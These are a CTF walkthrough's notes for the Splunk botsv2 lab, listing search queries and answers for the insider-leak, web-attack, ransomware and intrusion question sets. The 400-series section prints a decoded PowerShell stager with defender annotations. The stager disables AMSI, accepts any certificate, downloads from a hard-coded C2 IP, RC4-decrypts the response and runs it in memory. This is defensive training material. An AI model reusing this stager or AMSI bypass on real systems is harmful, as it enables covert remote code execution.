
v2
Count all events
index="botsv2" amber
index="botsv2" sourcetype="pan:traffic"
10.0.2.101
71.39.18.125
index="botsv2" Amber src_user="frothly.local\amber.turing" | reverse
index="botsv2" 10.0.2.101 *beer* sourcetype="stream:HTTP" | dedup site | table _time site
index="botsv2" 10.0.2.101 sourcetype="stream:HTTP" www.berkbeer.com | table _time uri_path
index="botsv2" *berk* "method{}"=MAIL
index="botsv2" mberk@berkbeer.com
index="botsv2" aturing@froth.ly
index="botsv2" | search "Heinz Bernhard Contact Information"
ambersthebest@yeastiebeastie.com
Amber Turing
mberk@berkbeer.com
Martin Berk
aturing@froth.ly
Amber Turing
hbernhard@berkbeer.com
Heinz Bernhard

index="botsv2" Amber TOR
index="botsv2" brewertalk.com
index="botsv2" brewertalk.com http_comment="HTTP/1.1 404 Not Found" | table _time src_ip src_header uri_path http_method | stats count by src_ip
45.77.65.211
index="botsv2" 52.42.208.228 | stats count by uri_path
index="botsv2" 52.42.208.228 | dedup form_data | table form_data
kIagerfield
index="botsv2" member.php SQL | stats count by form_data
index="botsv2" kevin | dedup cookie | table cookie src_ip dest_ip
300 series questions
index="botsv2" Mallory .pptx | dedup filename | table _time filename
index="botsv2" host="MACLORY-AIR13" .pptx
/Volumes//FROTHLY/Home/mallory.kraeusen/Frothly_marketing_campaign_Q317.pptx
/Users/mallorykraeusen/Documents/
index="botsv2" Mallory .crypt | dedup filename | table _time filename
index="botsv2" .mkv
index="botsv2" host="MACLORY-AIR13" ".crypt" sourcetype=ps
index="botsv2" kutekitten | search vendor action=added
columns.vendor_id
Look up that vendor ID online
index="botsv2" kutekitten.local mkraeusen | dedup columns.md5 | table columns.name columns.path columns.value name columns.cmdline columns.md5
befa9bfe488244c64db096522b4fad73fc01ea8c4cd0323f1cbdee81ba008271
72d4d364ed91dd9418d144a2db837a6d
index="botsv2" befa9bfe488244c64db096522b4fad73fc01ea8c4cd0323f1cbdee81ba008271
/Users/mkraeusen/Downloads/Important_HR_INFO_for_mkraeusen
The last two answers are found here:
400 series questions
index=botsv2 *.zip
C:\Users\billy.tun\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\4RND1WK1\invoice.zip
2017-08-24 03:27:29.947
index=botsv2 invoice.zip
Check the email content
index=botsv2 SSL app=ssl
ssl_issuer
index=botsv2 Frothly winsys32.dll
# Decoded PowerShell stager recovered via the winsys32.dll search above. Casing is randomised and
# some operators were split by whitespace during decoding ("NEW - ObjECt", "- BxOR", "- JoIN"),
# so this listing is for analysis only and does not run as-is.
# Defender notes: the fixed strings below (User-Agent, Cookie, C2 host and path, key) are the
# content indicators to pivot on in the pan:traffic and stream:HTTP data.

# Reflectively sets the non-public static field AmsiUtils.amsiInitFailed to $true, a widely
# documented AMSI-tampering indicator. PowerShell script block logging (event 4104) records this
# text and is where such a block can be detected.
[Ref].AsSEmbLY.GetTYPE('System.Management.Automation.AmsiUtils')|? {
$_
}
|% {
$_.GeTFIeLd('amsiInitFailed', 'NonPublic,Static').SEtVaLUE($nULl, $TRuE)
};
# Turns off the HTTP "Expect: 100-continue" handshake for the download below.
[SYstem.NEt.SERvICEPOInTMAnagER]::EXPEct100ContiNue = 0;
$wC = NEW - ObjECt SYsTeM.NeT.WEbCliEnt;
# Hard-coded User-Agent (matches an IE11-on-Windows-7 string) - usable as a content indicator.
$u = 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';
# Accepts any server certificate, so the C2 can present a self-signed cert
# (compare the ssl_issuer note in the 400 series above).
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {
$true
};
$wc.HeAdeRS.AdD('User-Agent', $u);
# Uses the system default proxy with the logged-on user's network credentials, so the download
# blends in with ordinary proxied browsing.
$WC.Proxy = [SySTEm.Net.WeBREQUeSt]::DEfAulTWeBProxY;
$Wc.PROxy.CReDeNtIalS = [SystEm.NEt.CrEdEntiaLCacHe]::DeFAuLtNetWORkCREDeNtIAls;
# Key bytes for the stream cipher below: the ASCII bytes of this 32-character string.
$K = [SystEm.Text.EncODIng]::ASCII.GeTByTeS('389288edd78e8ea2f54946d3209b16b8');
# $R is an RC4 routine taking ($D = data, $K = key): the first loop is the key-scheduling
# permutation of $S, the second generates the keystream and XORs it into each data byte.
$R = {
$D, $K = $ARgs;
$S = 0..255;
0..255|% {
$J = ($J + $S[$_] + $K[$_%$K.CouNt])%256;
$S[$_], $S[$J] = $S[$J], $S[$_]
};
$D|% {
$I = ($I + 1)%256;
$H = ($H + $S[$I])%256;
$S[$I], $S[$H] = $S[$H], $S[$I];
$_ - BxOR$S[($S[$I] + $S[$H])%256]
}
};
# Hard-coded session cookie - another content indicator for the HTTP stream data.
$wc.HeadERs.ADd("Cookie", "session=lrtRHKkA6IL5h/d8Ekk6QsxyPvk=");
# C2 endpoint; 45.77.65.211 is the same address recorded as an answer in the brewertalk.com
# section above.
$ser = 'https://45.77.65.211:443';
$t = '/admin/get.php';
$DATA = $WC.DoWNLoaDDATA($SER + $T);
# The first 4 bytes of the response are the IV and the rest is ciphertext; it is decrypted under
# (IV + key) and handed straight to Invoke-Expression (IEX), so the next stage runs in memory
# and nothing in this listing writes to disk.
$iV = $DAta[0..3];
$DatA = $dATa[4..$DaTa.lENGTh];
- JoIN[CHar[]](& $R $daTa ($IV + $K))|IEX
index="botsv2" winsys32.dll
Shows which program was used
index="botsv2" sourcetype="stream:ftp"
Shows the activity of the program that was used
index="botsv2" sourcetype="stream:ftp" method=RETR | dedup filename | table filename
Exposes the filename
Last updated